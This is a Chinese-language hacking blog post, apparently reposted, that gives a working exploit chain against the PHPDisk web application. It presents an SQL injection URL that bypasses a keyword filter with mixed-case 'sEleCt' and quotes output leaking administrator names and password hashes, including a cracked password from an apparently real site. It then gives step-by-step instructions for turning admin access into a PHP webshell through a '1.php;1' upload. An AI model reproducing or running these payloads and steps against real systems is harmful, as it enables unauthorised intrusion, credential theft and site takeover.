phpdisk 老漏洞新用法以及后台拿SHELL办法

2021年4月3日19:30:42评论228 views字数 2371阅读7分54秒阅读模式

以前暴出过通杀0DAY

代码如下

/api/datacall.php?type=user&limit=1&order=1 and(select 1 from(select count(*),concat((select (select (select concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&by=and 1=1&limit=1

漏洞是出在datacall.php的order参数没过滤好

但是不知道为啥不好用翻文件找原因之。。。

原来新版本的程序加上了如下过滤

if(!$type || !$order || !$by || !$limit){
        echo 'PHpdisk Datacall Parameter is null or Error!';
        exit;
}
$filter_arr = array('select','delete','update','insert');//过滤关键字
for($i=0;$i
	我们把以前的0DAY改一下


	把select关键字改成SEleCt


	语句如下


	/api/datacall.php?type=user&by=and%201=1&limit=1&order=1 and(sEleCt 1 from(sEleCt count(*),concat((sEleCt (sEleCt (sEleCt concat(0x27,0x7e,pd_users.username,0x27,0x7e,pd_users.password,0x27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#


	漏洞演示


	http://demo.xxx.com/55//api/datacall.php?type=user&by=and%201=1&limit=1&order=1%20and(sEleCt%201%20from(sEleCt%20count(*),concat((sEleCt%20(sEleCt%20(sEleCt%20concat(0x27,0x7e,pd_users.username,0x27,0x7e,pd_users.password,0x27,0x7e)%20from%20pd_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1#


	成功利用爆出密码


	MySQL Info: Duplicate entry ''~admin'~e10adc3949ba59abbe56e057f20f883e'~1' for key 'group_key' , 1062


	HOW TO GETSHELL？


	官方演示后台好像是做了文章的 进不去  我们换个别的站来演示 BAIDUHACK Powered by PHPDisk  


	http://ymzlk.xxx.com//api/datacall.php?type=user&by=and%201=1&limit=1&order=1%20and(sEleCt%201%20from(sEleCt%20count(*),concat((sEleCt%20(sEleCt%20(sEleCt%20concat(0x27,0x7e,pd_users.username,0x27,0x7e,pd_users.password,0x27,0x7e)%20from%20pd_users%20where%20userid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1#


	好 成功爆出账号密码


	MySQL Info: Duplicate entry ''~deathdd'~3a82b73fda0dc40ac27a83fcfabcb995'~1' for key 'group_key' , 1062


	deathdd death113


	在首页直接登陆


	登陆成功后点系统管理


	在输入一次我们的密码进去系统管理


	进入总管理后台后


	网站配置-高级选项-可外链的文件名里面添加上php;1


	然后在开启外连


	回到前台 在我的网盘里面上传一个1.php;1的文件


	在系统管理的文件管理里面找到我们刚才上传的那个文件 直接点开 得到SHELL地址


	http://ymzlk.xxx.com/filestores/deathdd/1.php;1 密码whoami 这样就拿下SHELL了  是不是很简单呢？

留言评论（旧系统）：


【匿名者】 @ 2012-09-22 14:19:49
核老大！版面有点小问题
本站回复：
啥问题？

文章来源于lcx.cc:phpdisk 老漏洞新用法以及后台拿SHELL办法

左青龙
微信扫一扫

右白虎
微信扫一扫

phpdisk 老漏洞新用法以及后台拿SHELL办法

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信